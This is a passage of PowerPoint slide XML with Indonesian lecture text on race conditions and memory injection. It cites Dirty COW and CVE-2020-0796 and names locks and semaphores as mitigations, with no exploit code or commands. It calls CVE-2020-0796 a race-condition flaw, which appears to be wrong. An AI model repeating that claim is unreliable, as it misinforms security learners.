              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atomik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengecekan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipisahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>balapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Dirty COW (CVE-2016-5195), yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>balapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di Kernel Linux, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Hak Istimewa Microsoft Windows (CVE-2020-0796), yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>balapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Microsoft Server Message Block 3.1.1 (SMBv3) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sewenang-wenang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SMB target. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>balapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, semaphore, dan monitor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> multi-threaded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Injeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Memori</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>injeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cacat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyuntikkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendesain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disuntikkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>injeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>parah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>injeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyuntikkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksfiltrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belakang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendatang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Kode yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disuntikkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
